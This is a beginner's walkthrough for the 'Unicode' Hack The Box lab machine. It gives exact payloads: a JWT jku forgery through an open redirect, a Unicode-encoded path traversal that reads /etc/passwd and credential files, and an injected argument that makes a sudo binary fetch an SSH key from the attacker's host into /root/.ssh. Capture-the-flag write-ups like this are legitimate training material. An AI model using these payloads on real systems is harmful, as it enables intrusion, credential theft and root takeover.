Hello, guys today we going to see the walkthrough for the Unicode hack the box machine and we going to take over the root flag and user flag from the machine…
ALERT:
THIS CONTENT OF THE ARTICLE IS FULLY FOCUSED ON THE BEGINNERS TO SOLVE THE HACK THE BOX MACHINE IF YOU LIKE THIS ARTICLE PLEASE BE SUBSCRIBE AND GIVE THE APPLAUSE
About Machine
This user flag of the machine is based on the redirection vulnerability to get the admin dashboard with LFI (Local File inclusion ) to get the User shell and abuse the sudo binary to escalate the root privilege. so let's get started
Enumeration:
So first we start up with our nmap scan for interesting stuff
STEP 1: nmap -sC -sV 10.10.11.126
Further analyzing this report you can able see the ssh service and you are able to see the title as hack media let us add this hack media to the host file which is /etc/hosts
>> 10.10.11.126 hackmedia.htb
Now you can able access this webpage using the domain
And further, I have tried the fuzzing also but I cannot able to find any interesting stuff…
So let's look at that website
Now you can able see the register page in the right corner
So first we going to register that on-page
And next, we going to log in using these credentials…
And I have captured this request in the burp suite for further analyze
Now you can able to see the JWT token which is the web token in the cookie header
So let's copy this encoded token and paste it into the jwt.io website to decode
After decoding you can able see http://hackmedia.htb/static/jwks.json
So let we check it this
Now you can able see the JSON keys
So let's download this JSON key
OPEN REDIRECTION VULNERABILITY:
Further analyzing this website you can able to see that the website is affected by open redirection vulnerability
You can able see this in the below image
First I started the python server
And I have set redirection to my local server
Now you can able understand…..
By using this vulnerability I going to abuse the JWT token you can able understand using the below article
Through reading the article, you can able known about the JKU claim of Misuse
You can also use the above method but we going to use the simple step to create the private and public using the simple step
So first we going to create the private and public keys using the below website
So now the key is generated and note kye size and name in the above image
And paste this key in the token and change juk and set the username as the admin because its the default username of the website
juk : http://hackmedia.htb/static/jwks.json/./../redirect/?url=<attacker.ip>/jwks.json
So next we going to change the n module in the jwks JSON key
So first download the jwks.json file using the below command
STEP 2: wget http://hackmedia.htb/static/jwks.json
Now you can able see that n is a module and e is an exponent.
So next copy the n value in both private and public keys that we have generated before.
So now I have changed the n value
Next, start the python server using the below command
STEP 3: python3 -m http.server 80
Note: set the same port which you have set the JWT token
Copy the JWT token and paste it into the cookie editor
Boommmmmmmm!!!!!!
Now you will get the admin dashboard.
Now you get the admin dashboard next click the last quarter tab
Now you get this page
NORMALIZATION OF UNICODE:
Further analyzing this page I have found that this website is affected by LFI ( Local file inclusion )
You can check https://lazarv.com/posts/unicode-normalization-vulnerabilities/
For further analysis, I have captured this request in burpsuite
I have found that It was blocking the / symbol
So have googled for this and I got another interesting article
By seeing the above image you can able see the interesting Unicode character so we try this !!!!!
Now its working so replace / = %ef%bc%8f
Enter this Unicode character five-time
STEP 4: GET /display/?page=..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
Boommmmmmmm!!!!! Now you will get the password file
So next I have checked the /proc/self/environ and I have found the username which is code
And I have tried the /proc/self/cmdline and I have found the python file which is an app
After trying for a long I have tried the /proc/self/cwd/app.py
Further analyzing this code it has loaded the db_yaml file from MySQL server
So let us try this /proc/self/cwd/db_yaml
Now you can able see the username and passed
where the username = code, and password = B3stC0d3r2021@@!
So let us try this user name and password in SSH because the SSH port is open ( you can able to see this in the nmap report )
boooooooooooooooommmmmmmm!!!!!!!
Now you will get the user flag which is user.txt
ROOT FLAG:
sudo binary abuse
STEP 5: sudo -l
Now just run that binary using sudo ( in root privilege )
STEP 6: sudo /usr/bin/treport
I have chosen the 3 options and I enter the file name as file://etc/passwd
I think this binary is affected by command injection vulnerability so let’s try some blacklisitng ideas (( , . : | )), etc….
boooooffffff !!!!
It working !!!!!!!
First I have tried a lot of queries. after a long time I have founded that
FiLe:///etc/passwd
Now you get one file and choose the second option ( checked in the image )
So next I going to create the ssh key to get login through the SSH
Do this command in your local machine
STEP 7: ssh-keygen -f root
STEP 8: cat root.pub
copy that key and paste the new file and name as authorized_key
And next start your python server
STEP 9: python3 -m http.server 80
STEP 10 : {http://10.10.14.103/authorized_key,-o,/root/.ssh/authorized_keys}
So now your file will be saved in the /root/.ssh
Next, we going to log in through ssh using the private key which named as the root
STEP 11: ssh -i root root@hackmedia.htb
hooooooooooooooooo!!!!!!!! ohhhhhhyeahhhhhhh!!!!!
Now you get the root shell
STEP 12: cat root.txt
Booooooooooommmmm!!!!!!
Now you can able see the root flag
I hope you will understand this article if you like this article please be subscribed to my blog and give me applause which will motivate me to do more articles and walkthroughs to publish
And if want to support me for OSCP Exam donate us
DONATE US:
